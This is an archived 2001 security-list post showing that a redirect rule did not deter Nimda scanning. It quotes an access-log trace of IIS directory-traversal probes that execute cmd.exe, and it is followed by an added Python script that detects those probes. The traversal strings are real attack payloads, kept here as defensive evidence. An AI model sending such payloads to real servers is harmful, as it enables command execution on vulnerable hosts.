Tina Bird <tbird@precision-guesswork.com> wrote:

> Can I ask a question?
>
> According to Ryan Russell (who's been analyzing the
> worm code), Nimda doesn't honor redirects - it just
> checks the response it gets from a Web server to
> determine whether or not the server is vulnerable.
> It doesn't follow redirects. So what does this
> actually accomplish?

In my experience this is correct. I implemented the redirect this morning (09:00), and just got an extended scan (162 hits) from a source which appeared to be completely unaffected by the new setting. Evidence provided below.

Best regards,

Neil Dickey, Ph.D.
Research Associate/Sysop
Geology Department
Northern Illinois University
DeKalb, Illinois 60115

------------------------------------------------------------------

Here's the line in the configuration file ...

RedirectMatch (.*)\cmd.exe$ http://127.0.0.1

... and here's the log trace:

hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
hs090.fau.edu - - [25/Sep/2001:13:15:22 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:03 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
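The trace above makes a point that is easy to check mechanically: once the server starts answering 302, the worm keeps probing anyway, so a redirect is a log-noise change rather than a mitigation. The script below is an added example, not code from the post or its author; it parses Common Log Format lines, flags the root.exe/cmd.exe probe requests seen in the trace, summarizes them per source host by status code, and counts how many probes arrived after the first 302 to that host (a non-zero count means the scanner ignored the redirect). The sample lines are constructed for the example: the hs090.fau.edu entries are copied from the trace, and the 192.0.2.10 request is an invented benign hit to show that ordinary traffic is left alone.

```python
import re
from collections import Counter

# Constructed sample access-log lines (Common Log Format). The first four are
# copied from the trace in the post; the last is an invented benign request.
SAMPLE_LOG = """\
hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
192.0.2.10 - - [25/Sep/2001:13:20:00 -0500] "GET /index.html HTTP/1.0" 200 1043
"""

# host ident user [time] "method path proto" status size  (referer/UA, if
# present in combined format, are simply not captured)
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The probe family visible in the trace: every request targets root.exe or
# cmd.exe, whatever directory-traversal encoding precedes it.
PROBE_RE = re.compile(r'(root|cmd)\.exe', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one CLF line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_probe(path):
    """True when the request path looks like a root.exe/cmd.exe worm probe."""
    return PROBE_RE.search(path) is not None


def summarize(lines):
    """Per source host: number of probe requests and a Counter of status codes."""
    summary = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_probe(rec["path"]):
            continue
        entry = summary.setdefault(rec["host"], {"probes": 0, "by_status": Counter()})
        entry["probes"] += 1
        entry["by_status"][rec["status"]] += 1
    return summary


def probes_after_first_redirect(lines):
    """Per host, how many probes arrived after the server first answered 302.

    A scanner that honoured the redirect would have nothing to send after that
    point; a non-zero count shows the 302 did not change its behaviour.
    """
    seen_redirect = set()
    after = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_probe(rec["path"]):
            continue
        host = rec["host"]
        if host in seen_redirect:
            after[host] += 1
        elif rec["status"] == "302":
            seen_redirect.add(host)
    return dict(after)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for host, entry in summarize(lines).items():
        print(host, entry["probes"], "probes", dict(entry["by_status"]))
    print("probes after first 302:", probes_after_first_redirect(lines))
```

Run against a real access log by replacing `SAMPLE_LOG.splitlines()` with the file's lines; the per-status breakdown is also a quick way to see which encodings a given rule actually matched (in the trace, the `%%35...` variants drew a 400 from the server before the RedirectMatch rule could apply).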
This archive was generated by hypermail 2b30 : Tue Sep 25 2001 - 13:16:38 PDT